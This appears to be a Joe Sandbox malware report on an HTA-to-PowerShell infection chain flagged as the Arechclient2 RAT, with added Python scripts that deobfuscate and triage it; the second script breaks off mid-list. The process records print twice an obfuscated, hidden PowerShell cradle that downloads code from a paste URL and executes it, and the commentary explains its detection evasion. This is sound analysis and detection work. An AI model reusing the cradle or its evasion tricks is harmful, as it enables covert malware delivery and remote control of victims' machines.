                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A20EB716_2_00A20EB7
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A08E4416_2_00A08E44
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D6FE616_2_009D6FE6
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C33B716_2_009C33B7
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009A94E016_2_009A94E0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CF40916_2_009CF409
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009BD45D16_2_009BD45D
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C16B416_2_009C16B4
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009AF6A016_2_009AF6A0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009BF62816_2_009BF628
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C78C316_2_009C78C3
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C1BA816_2_009C1BA8
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CDBA516_2_009CDBA5
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009D9CE516_2_009D9CE5
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009BDD2816_2_009BDD28
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CBFD616_2_009CBFD6
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009C1FC016_2_009C1FC0
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A7BFA16_2_010A7BFA
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A7C0116_2_010A7C01
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\33260509\updater.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: String function: 00FE8B30 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: String function: 00FE0D17 appears 70 times
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: String function: 00FD1A36 appears 34 times
                    Source: C:\faggbgb\AutoIt3.exeCode function: String function: 009C0D17 appears 70 times
                    Source: C:\faggbgb\AutoIt3.exeCode function: String function: 009B1A36 appears 34 times
                    Source: C:\faggbgb\AutoIt3.exeCode function: String function: 009C8B30 appears 42 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 4496
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 4496
                    Source: amsi32_7608.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 14.2.updater.exe.4a76e70.1.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                    Source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                    Source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@34/83@6/5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102A6AD GetLastError,FormatMessageW,14_2_0102A6AD
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01018DE9 AdjustTokenPrivileges,CloseHandle,14_2_01018DE9
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01019399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,14_2_01019399
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009F8DE9 AdjustTokenPrivileges,CloseHandle,16_2_009F8DE9
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009F9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_009F9399
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,14_2_0102B976
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01024148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,14_2_01024148
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102C9DA CoInitialize,CoCreateInstance,CoUninitialize,14_2_0102C9DA
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0102443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,14_2_0102443D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\i1040gi.pdf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\134e9b5a5131414a9ec92122150d9aa3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqlffxlj.snv.ps1
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\faggbgb\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\faggbgb\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\payload_1.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = Cg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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1648,i,15822098111641296172,2076974051186790361,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\33260509\updater.exe "C:\Users\user\AppData\Local\Temp\33260509\updater.exe" C:\Users\user\AppData\Local\Temp\33260509\JfEljoTl.dll
Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\faggbgb\AutoIt3.exe "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
Source: C:\faggbgb\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\faggbgb\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\faggbgb\AutoIt3.exe "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
Source: C:\faggbgb\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
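The second PowerShell command line above never names a cmdlet or a method. It reaches $ExecutionContext through the Variable: drive with the glob E*onte*, enumerates $ExecutionContext.InvokeCommand and the WebClient object with Get-Member, and picks the member to call with a -ilike wildcard; the cmdlet names themselves are looked up with GetCommandName('Ne*ct', ...) and GetCommandName('In*-Ex*ion', ...). The Python script below is an added analysis aid, not part of the Joe Sandbox report or of the sample: it resolves those wildcards statically, the way Where-Object would at run time, against the member names a stock Windows PowerShell 5.1 session exposes (the candidate lists are an assumption about such a session) and extracts the download URL. It also reproduces the first stage's CgMQB helper, which turns a hex string into 0x-prefixed byte tokens; what the elided remainder of that first command line does with the tokens is not shown on the page.

```python
import fnmatch
import re

# Member names that Get-Member returns for the objects the script enumerates on a
# stock Windows PowerShell 5.1 session (constructed lists; the assumption is that
# no extra module adds a competing name that a pattern could also match).
CANDIDATES = {
    "automatic variables": [
        "ExecutionContext", "Error", "ErrorActionPreference", "ErrorView", "Host",
        "HOME", "input", "MyInvocation", "PID", "PSVersionTable", "PWD",
    ],
    "$ExecutionContext.InvokeCommand": [
        "ExpandString", "GetCmdlet", "GetCmdletByTypeName", "GetCmdlets", "GetCommand",
        "GetCommandName", "GetCommands", "HasErrors", "InvokeScript", "NewScriptBlock",
        "Equals", "GetHashCode", "GetType", "ToString",
    ],
    "Net.WebClient": [
        "DownloadData", "DownloadDataAsync", "DownloadFile", "DownloadString", "OpenRead",
        "OpenWrite", "UploadData", "UploadFile", "UploadString", "Dispose", "Equals",
        "GetHashCode", "GetType", "ToString",
    ],
    "command names": [  # what GetCommandName(pattern, $true, ...) can return
        "New-Object", "New-Item", "New-Variable", "Invoke-Expression", "Invoke-Command",
        "Invoke-Item", "Invoke-WebRequest", "Set-Variable",
    ],
}
WILDCARD = re.compile(r"[*?\[]")


def like(name, pattern):
    """PowerShell -ilike: case-insensitive, with * ? and [...] wildcards (fnmatch's syntax)."""
    return fnmatch.fnmatchcase(name.lower(), pattern.lower())


def deobfuscate(cmdline):
    """Resolve each wildcard the command line relies on without running it.
    Returns (resolved, url): resolved maps pattern -> member/command name (a list if ambiguous)."""
    patterns = (re.findall(r"Variable:[\\/]([^\s)]+)", cmdline)   # Get-ChildItem Variable:\E*onte*
                + re.findall(r"-ilike'([^']*)'", cmdline)          # Where-Object { ...Name -ilike '...' }
                + re.findall(r"\.Invoke\('([^']*)'", cmdline))     # GetCommandName('Ne*ct', $TRUE, ...)
    resolved = {}
    for pat in patterns:
        if pat in resolved or not WILDCARD.search(pat):
            continue  # t8, s and _ are the script's own variables, not lookups
        hits = [n for names in CANDIDATES.values() for n in names if like(n, pat)]
        if not hits:
            raise ValueError(f"nothing matches {pat!r}; extend CANDIDATES")
        resolved[pat] = hits[0] if len(hits) == 1 else hits
    url = re.search(r"https?://[^\s'\"]+", cmdline)
    return resolved, (url.group(0) if url else None)


def stage1_tokens(hex_text):
    """Python equivalent of the first stage's `-split ($seVe -replace '..', '0x$& ')`:
    every two characters become one 0x-prefixed token, then the unary -split cuts on whitespace."""
    return re.sub(r"..", lambda m: "0x" + m.group(0) + " ", hex_text).split()


def stage1_bytes(hex_text):
    """The bytes those tokens stand for (a later cast to [byte[]] would do the same)."""
    return bytes(int(tok, 16) for tok in stage1_tokens(hex_text))


# The second-stage command line exactly as the report lists it (the -Command argument only).
STAGE2 = (
    r"cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*)"
    r".Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke("
    r"(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand"
    r"|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);"
    r"SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem "
    r"Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name)"
    r".Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value."
    r"InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',"
    r"$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)"
    r"|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)"
    r"|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))"
)

if __name__ == "__main__":
    names, url = deobfuscate(STAGE2)
    for pat, name in names.items():
        print(f"{pat:12} -> {name}")
    print("payload URL:", url)
    print(stage1_tokens("4d5a9000"), stage1_bytes("4d5a9000"))
```

Resolved, the cradle reads `$t8 = New-Object Net.WebClient; $s = 'https://nopaste.net/SFHgtxFGtB'; Invoke-Expression ([String]::Join('', ($t8.DownloadData($s) | ForEach { [char]$_ })))`: the paste is fetched as raw bytes, widened byte-for-byte to characters and evaluated, and `-w hidden -ep bypass -nop` keeps the window off screen, ignores the execution policy and skips the profile. Because no cmdlet or method name survives in the command line, detections keyed on `Invoke-Expression`, `IEX` or `DownloadString` miss it; the stable tokens are the `Variable:\E*onte*` lookup and the `Get-Member|Where-Object{...-ilike'...'}` member selection.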
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = Cg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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\33260509\updater.exe "C:\Users\user\AppData\Local\Temp\33260509\updater.exe" C:\Users\user\AppData\Local\Temp\33260509\JfEljoTl.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\faggbgb\AutoIt3.exe "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1648,i,15822098111641296172,2076974051186790361,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\faggbgb\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\faggbgb\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\faggbgb\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
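Read together, the process creations above are one chain. mshta.exe runs the HTA; it starts PowerShell with the execution policy, window style and profile overridden; that stage starts a second, hidden PowerShell download cradle; the downloaded stage opens a decoy PDF from AppData\Roaming in Acrobat, runs updater.exe from a numbered Temp folder with a DLL as its argument, and the AutoIt3.exe interpreter is run from C:\faggbgb with a compiled .a3x script. Both updater.exe and AutoIt3.exe then start MSBuild.exe with no project file, which is what a hollowed host for an injected .NET payload looks like: a build tool given nothing to build. The Python rules below are added here and are not part of the report; they run over those records, transcribed as constructed (parent, image, command line) tuples with the two PowerShell command lines cut down to the options the rules inspect, and return why each record is flagged.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "parent image cmdline")


def base(path):
    """Lower-cased file name of a Windows path ('unknown' stays as is)."""
    return path.rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline):
    """Drop the (optionally quoted) image path and return the remaining argument text."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)', cmdline, re.S)
    return m.group(1).strip() if m else ""


# PowerShell accepts unique prefixes of its switches, so -w / -ep / -nop are matched as such.
PS_FLAGS = {
    "execution policy overridden": re.compile(r"-(?:ep|ex\w*)\s+(?:bypass|unrestricted)\b", re.I),
    "window hidden": re.compile(r"-w(?:in\w*)?\s+(?:hidden|1)\b", re.I),          # -w 1 == -WindowStyle Hidden
    "profile skipped": re.compile(r"-nop\w*\b", re.I),
    "member names resolved at runtime via Get-Member/-ilike": re.compile(r"Get-Member.*-i?like\s*'", re.I | re.S),
    "wildcarded Variable: drive lookup": re.compile(r"Variable:[\\/][^\s)]*[*?]", re.I),
}
# Parents that legitimately start MSBuild.exe; anything else handing it no project is suspect.
DEV_PARENTS = {"devenv.exe", "dotnet.exe", "cmd.exe", "msbuild.exe", "nuget.exe", "vbcscompiler.exe"}


def check(p):
    """Reasons a single process-creation record is suspicious (empty list when none)."""
    img, par, args = base(p.image), base(p.parent), args_after_image(p.cmdline)
    reasons = []
    if img == "powershell.exe":
        reasons += [name for name, rx in PS_FLAGS.items() if rx.search(args)]
        if par == "mshta.exe":
            reasons.append("spawned by mshta.exe")
    elif img == "msbuild.exe" and not args and par not in DEV_PARENTS:
        reasons.append(f"MSBuild.exe started without a project by {par}: likely injection host")
    elif img == "autoit3.exe":
        if "\\program files" not in p.image.lower():
            reasons.append("AutoIt interpreter running outside Program Files")
        if re.search(r"\.a3x\b", args, re.I):
            reasons.append("compiled AutoIt script (.a3x) passed as argument")
    elif img == "acrobat.exe" and par == "powershell.exe":
        reasons.append("PDF viewer launched by PowerShell: decoy document")
    elif "\\appdata\\local\\temp\\" in p.image.lower() and re.search(r"\.dll\b", args, re.I):
        reasons.append("temp-resident executable handed a DLL argument")
    return reasons


def triage(records):
    """Map 'parent > child' to its reasons, keeping only the suspicious records."""
    out = {}
    for r in records:
        reasons = check(r)
        if reasons:
            out[f"{base(r.parent)} > {base(r.image)}"] = reasons
    return out


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
ACRO = r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe"
ACROCEF = r"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe"
UPDATER = r"C:\Users\user\AppData\Local\Temp\33260509\updater.exe"
AUTOIT = r"C:\faggbgb\AutoIt3.exe"

# Records transcribed from the report; the PowerShell command lines are abbreviated.
RECORDS = [
    Proc("unknown", r"C:\Windows\SysWOW64\mshta.exe", r'mshta.exe "C:\Users\user\Desktop\payload_1.hta"'),
    Proc(r"C:\Windows\SysWOW64\mshta.exe", PS,
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){'),
    Proc(PS, PS,
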